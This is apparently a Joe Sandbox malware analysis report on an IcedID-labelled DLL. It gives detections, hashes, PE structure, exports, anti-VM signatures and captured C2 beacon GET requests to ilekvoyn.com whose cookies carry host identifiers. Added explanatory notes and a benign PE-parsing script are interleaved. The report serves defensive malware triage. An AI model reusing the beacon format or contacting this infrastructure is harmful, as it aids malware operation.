  Signatures: Contains functionality to detect hardware virtualization (CPUID execution measurement); Tries to detect virtualization through RDTSC time measurements
  Started: cmd.exe, regsvr32.exe, rundll32.exe, 2 other processes
• cmd.exe, started by loaddll64.exe
  Started: rundll32.exe
• regsvr32.exe, started by loaddll64.exe
  DNS/IP: ilekvoyn.com 64.227.182.2, ports 49740, 49741, 49743, DIGITALOCEAN-ASNUS Canada
  Signatures: Contains functionality to detect hardware virtualization (CPUID execution measurement); Tries to detect virtualization through RDTSC time measurements
• rundll32.exe, started by loaddll64.exe
  Signatures: System process connects to network (likely due to code injection or exploit)
• rundll32.exe, started by cmd.exe
  DNS/IP: ilekvoyn.com
  Signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to detect hardware virtualization (CPUID execution measurement); Tries to detect virtualization through RDTSC time measurements

Antivirus, machine learning and genetic malware detection

Initial sample (Source | Detection | Scanner | Label):
J5V5DR.dll | 14% | Virustotal | (no label)
J5V5DR.dll | 12% | ReversingLabs | Win64.Trojan.IcedID

Dropped files: No Antivirus matches

Unpacked PE files (Source | Detection | Scanner | Label):
2.2.regsvr32.exe.180000000.2.unpack | 100% | Avira | HEUR/AGEN.1205098
0.2.loaddll64.exe.180000000.0.unpack | 100% | Avira | HEUR/AGEN.1205098
4.2.rundll32.exe.180000000.0.unpack | 100% | Avira | HEUR/AGEN.1205098
3.2.rundll32.exe.180000000.0.unpack | 100% | Avira | HEUR/AGEN.1205098

Domains (Source | Detection | Scanner):
ilekvoyn.com | 3% | Virustotal

URLs (Source | Detection | Scanner | Label):
http://ilekvoyn.com/ | 3% | Virustotal | (no label)
http://ilekvoyn.com/ | 0% | Avira URL Cloud | safe
http://ilekvoyn.com/4 | 0% | Avira URL Cloud | safe
http://ilekvoyn.com/u5 | 0% | Avira URL Cloud | safe
ilekvoyn.com | 0% | Avira URL Cloud | safe
http://ilekvoyn.com/Y | 0% | Avira URL Cloud | safe
https://shapka-youtube.ru/ | 0% | Avira URL Cloud | safe
http://ilekvoyn.com:80/ | 0% | Avira URL Cloud | safe

Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
ilekvoyn.com | 64.227.182.2 | true | true | (none) | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://ilekvoyn.com/ | true | 3% Virustotal; Avira URL Cloud: safe | unknown
ilekvoyn.com | true | Avira URL Cloud: safe | unknown

URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation):
http://ilekvoyn.com/4 | rundll32.exe, 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ilekvoyn.com/u5 | rundll32.exe, 00000004.00000002.279383760.000001EDE5D16000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ilekvoyn.com/Y | rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://shapka-youtube.ru/ | loaddll64.exe, 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ilekvoyn.com:80/ | regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
64.227.182.2 | ilekvoyn.com | Canada | 14061 | DIGITALOCEAN-ASNUS | true
              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:632638
Start date and time: 2022-05-23 20:59:23 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 31s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:J5V5DR.dll
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 31
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winDLL@13/0@4/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 54.5% (good quality ratio 35.3%)
              • Quality average: 37.8%
              • Quality standard deviation: 35.2%
              HCA Information:
              • Successful, ratio: 94%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .dll
              • Adjust boot time
              • Enable AMSI
              • Override analysis time to 240s for rundll32
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
              • Excluded IPs from analysis (whitelisted): 184.30.21.144
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
Time | Type | Description
21:00:41 | API Interceptor | 1x Sleep call for process: regsvr32.exe modified
21:00:41 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
21:00:54 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
              No context
              No created / dropped files found
              File type:PE32+ executable (DLL) (console) x86-64, for MS Windows
              Entropy (8bit):4.565829607652442
              TrID:
              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
              • Win64 Executable (generic) (12005/4) 10.17%
              • Generic Win/DOS Executable (2004/3) 1.70%
              • DOS Executable Generic (2002/1) 1.70%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
              File name:J5V5DR.dll
              File size:718848
              MD5:9b692f43d575acb739decfc809db7f2e
              SHA1:bc42c60590cb908e765e2d97e8b3a92b4616cd30
              SHA256:0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7
              SHA512:f99f546940bd96c6e9cac6a8500f25280ed190b9830247a5c7249d30a40fd1b4e3c94ca0455e337e77682a7a2b14a259b0aa4cf9680e9ccf727f71ae69873473
              SSDEEP:12288:ls83XIJDjnYSwX+rX8UsV6C7u7v0euPFwdH1hOR6LF9aFpJv7B5pCYUtvRwzoH7n:vHIJLDc+rDCK7v0pFoVhRF9aFfDCFH7p
              TLSH:A1E4BFB875143CD6E66E527BDAD6BDDD13B627638A8BA8CC8064B7C30563371FE02805
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........q.R...R...R...o...........\...g...(...D...^...........RichR...........PE..d...fZ.b.........." .....^.........................
              Icon Hash:74f0e4ecccdce0e4
              Entrypoint:0x180000000
              Entrypoint Section:
              Digitally signed:false
              Imagebase:0x180000000
              Subsystem:windows cui
              Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
              Time Stamp:0x628B5A66 [Mon May 23 09:56:54 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:5fc0865d8cfea72f745977b121a33fe9
Entrypoint instructions (disassembly at 0x180000000):
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
Note: the entrypoint equals the image base and "Entrypoint Section" is empty, i.e. AddressOfEntryPoint is 0. The listing above is the DOS header (4D 5A 90 00 03 00 00 00 04 00 00 00, the "MZ" signature) decoded as x86 and is not real code. The loader calls no DllMain for this DLL; its code runs only when one of the exported functions is called, which is why the sandbox invokes the exports individually through rundll32 (see the process list below).
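The "no entrypoint" condition above is worth checking programmatically before triaging a DLL, because it decides whether loading the file is enough to run it or whether an export must be called. The following is an added example (not part of the Joe Sandbox report and not the sample's bytes): it reads AddressOfEntryPoint and ImageBase from a PE32+/PE32 header the way the report's "Entrypoint" line is derived, and the `build_header` helper fabricates a minimal header with the same values the report shows (entrypoint RVA 0, image base 0x180000000, DLL flag set) as constructed test input.

```python
import struct

IMAGE_FILE_DLL = 0x2000
PE32PLUS_MAGIC = 0x20B
PE32_MAGIC = 0x10B


def build_header(entry_rva: int, image_base: int, is_dll: bool = True) -> bytes:
    """Build a constructed minimal PE32+ header (DOS header, PE signature, COFF
    file header, optional header). Test input only, not bytes of J5V5DR.dll."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: PE signature at 0x40
    # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE, optionally | DLL (as in the report)
    characteristics = 0x0002 | 0x0020 | (IMAGE_FILE_DLL if is_dll else 0)
    file_hdr = struct.pack("<HHIIIHH", 0x8664, 3, 0x628B5A66, 0, 0, 240, characteristics)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<I", opt, 16, entry_rva)         # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, image_base)        # ImageBase (8 bytes in PE32+)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)


def entry_point_info(data: bytes) -> dict:
    """Read the entrypoint the way a sandbox summary does and report whether the
    image has one at all (AddressOfEntryPoint == 0 means the loader calls nothing)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)[6]
    opt = e_lfanew + 24                                # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    elif magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return {
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "pe32plus": magic == PE32PLUS_MAGIC,
        "image_base": image_base,
        "entry_rva": entry_rva,
        "entry_va": image_base + entry_rva,            # what the report prints as "Entrypoint"
        "has_entry_point": entry_rva != 0,
    }


def describe(data: bytes) -> str:
    """One-line triage verdict for the entrypoint."""
    info = entry_point_info(data)
    if not info["has_entry_point"]:
        return ("Entrypoint 0x%x equals the image base: AddressOfEntryPoint is 0, the loader "
                "calls no DllMain, and code runs only through the exports; a disassembly at the "
                "entrypoint shows the DOS header ('MZ' = 4D 5A) decoded as x86." % info["entry_va"])
    return "Entrypoint 0x%x (RVA 0x%x)" % (info["entry_va"], info["entry_rva"])


if __name__ == "__main__":
    print(describe(build_header(0, 0x180000000)))
```

With a real file, pass `open(path, "rb").read()` to `entry_point_info`; the function only touches the headers, so the 0xa9200-byte .data section is never parsed.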
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x7070 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7204 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7050 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Note: DYNAMIC_BASE is set in the DLL characteristics, but the base relocation directory is empty, so the loader has no relocation data to rebase the image with and it is expected at its preferred base 0x180000000. There is also no security (Authenticode) directory, consistent with "Digitally signed: false".
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5cf1 | 0x5e00 | False | 0.623213098404 | DOS executable (COM) | 6.22619936287 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x344 | 0x400 | False | 0.4814453125 | data | 3.58877198554 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0xa90e1 | 0xa9200 | False | 0.557561610772 | data | 4.36278743937 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
Note: the "File Type" column is a libmagic guess on the raw section bytes and carries no meaning for .text. The .data section's raw size of 0xa9200 (692736) bytes accounts for about 96% of the 718848-byte file, while the code section is under 24 KB.
DLL | Import
USER32.dll | CreateDialogIndirectParamA, AppendMenuA, CharPrevA, DdeQueryStringA, ChangeDisplaySettingsExA
GDI32.dll | GetCharWidthFloatA, ExtFloodFill, GetGraphicsMode
Name | Ordinal | Address
DllRegisterServer | 1 | 0x180001054
HdQZgnE | 2 | 0x180006849
IfkPmdu | 3 | 0x18000675f
cJPSzqHBMN | 4 | 0x180006928
pcufUY | 5 | 0x180006716
rHqnYSA | 6 | 0x1800068c4
zlmkoZLQMd | 7 | 0x1800067cd
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2022 21:00:40.544537067 CEST | 49740 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:40.633488894 CEST | 49741 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:40.720813036 CEST | 80 | 49740 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:40.720971107 CEST | 49740 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:40.724489927 CEST | 49740 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:40.809746027 CEST | 80 | 49741 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:40.809890032 CEST | 49741 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:40.812602043 CEST | 49741 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:40.873374939 CEST | 49743 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:40.900010109 CEST | 80 | 49740 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:40.988132954 CEST | 80 | 49741 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:41.046269894 CEST | 80 | 49743 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:41.046395063 CEST | 49743 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:41.046794891 CEST | 49743 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:41.219418049 CEST | 80 | 49743 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:41.517158031 CEST | 80 | 49740 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:41.604914904 CEST | 80 | 49741 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:41.764945984 CEST | 49740 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:41.784478903 CEST | 49741 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:41.832554102 CEST | 80 | 49743 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:41.940778017 CEST | 49743 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:42.421145916 CEST | 49740 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:42.641917944 CEST | 49741 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:42.863286018 CEST | 49743 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:53.574182987 CEST | 49750 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:53.743202925 CEST | 80 | 49750 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:53.743336916 CEST | 49750 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:53.743892908 CEST | 49750 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:53.911603928 CEST | 80 | 49750 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:54.528074980 CEST | 80 | 49750 | 64.227.182.2 | 192.168.2.3
May 23, 2022 21:00:54.645014048 CEST | 49750 | 80 | 192.168.2.3 | 64.227.182.2
May 23, 2022 21:00:55.435754061 CEST | 49750 | 80 | 192.168.2.3 | 64.227.182.2
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2022 21:00:40.514008999 CEST | 55923 | 53 | 192.168.2.3 | 8.8.8.8
May 23, 2022 21:00:40.533164978 CEST | 53 | 55923 | 8.8.8.8 | 192.168.2.3
May 23, 2022 21:00:40.601308107 CEST | 57723 | 53 | 192.168.2.3 | 8.8.8.8
May 23, 2022 21:00:40.622952938 CEST | 53 | 57723 | 8.8.8.8 | 192.168.2.3
May 23, 2022 21:00:40.842926025 CEST | 58116 | 53 | 192.168.2.3 | 8.8.8.8
May 23, 2022 21:00:40.862569094 CEST | 53 | 58116 | 8.8.8.8 | 192.168.2.3
May 23, 2022 21:00:53.517409086 CEST | 57421 | 53 | 192.168.2.3 | 8.8.8.8
May 23, 2022 21:00:53.537255049 CEST | 53 | 57421 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 23, 2022 21:00:40.514008999 CEST | 192.168.2.3 | 8.8.8.8 | 0xca73 | Standard query (0) | ilekvoyn.com | A (IP address) | IN (0x0001)
May 23, 2022 21:00:40.601308107 CEST | 192.168.2.3 | 8.8.8.8 | 0xdfe7 | Standard query (0) | ilekvoyn.com | A (IP address) | IN (0x0001)
May 23, 2022 21:00:40.842926025 CEST | 192.168.2.3 | 8.8.8.8 | 0x53e0 | Standard query (0) | ilekvoyn.com | A (IP address) | IN (0x0001)
May 23, 2022 21:00:53.517409086 CEST | 192.168.2.3 | 8.8.8.8 | 0x204c | Standard query (0) | ilekvoyn.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 23, 2022 21:00:40.533164978 CEST | 8.8.8.8 | 192.168.2.3 | 0xca73 | No error (0) | ilekvoyn.com | | 64.227.182.2 | A (IP address) | IN (0x0001)
May 23, 2022 21:00:40.622952938 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfe7 | No error (0) | ilekvoyn.com | | 64.227.182.2 | A (IP address) | IN (0x0001)
May 23, 2022 21:00:40.862569094 CEST | 8.8.8.8 | 192.168.2.3 | 0x53e0 | No error (0) | ilekvoyn.com | | 64.227.182.2 | A (IP address) | IN (0x0001)
May 23, 2022 21:00:53.537255049 CEST | 8.8.8.8 | 192.168.2.3 | 0x204c | No error (0) | ilekvoyn.com | | 64.227.182.2 | A (IP address) | IN (0x0001)
              • ilekvoyn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49740 | 64.227.182.2 | 80 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
May 23, 2022 21:00:40.724489927 CEST | 714 | OUT | GET / HTTP/1.1
              Connection: Keep-Alive
              Cookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:38333943384646433645323531353035; __io=0; _gid=67AFED4C8997
              Host: ilekvoyn.com
May 23, 2022 21:00:41.517158031 CEST | 817 | IN | HTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 23 May 2022 19:00:41 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49741 | 64.227.182.2 | 80 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
May 23, 2022 21:00:40.812602043 CEST | 715 | OUT | GET / HTTP/1.1
              Connection: Keep-Alive
              Cookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:31323037463731444444363041413743; __io=0; _gid=67AFED4C8997
              Host: ilekvoyn.com
May 23, 2022 21:00:41.604914904 CEST | 961 | IN | HTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 23 May 2022 19:00:41 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49743 | 64.227.182.2 | 80 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
May 23, 2022 21:00:41.046794891 CEST | 755 | OUT | GET / HTTP/1.1
              Connection: Keep-Alive
              Cookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:45324342413344443837343036393933; __io=0; _gid=67AFED4C8997
              Host: ilekvoyn.com
May 23, 2022 21:00:41.832554102 CEST | 981 | IN | HTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 23 May 2022 19:00:41 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49750 | 64.227.182.2 | 80 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
May 23, 2022 21:00:53.743892908 CEST | 1125 | OUT | GET / HTTP/1.1
              Connection: Keep-Alive
              Cookie: __gads=109932505:1:3929:119; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:37383344384639433838463446394437; __io=0; _gid=67AFED4C8997
              Host: ilekvoyn.com
May 23, 2022 21:00:54.528074980 CEST | 1126 | IN | HTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 23 May 2022 19:00:54 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
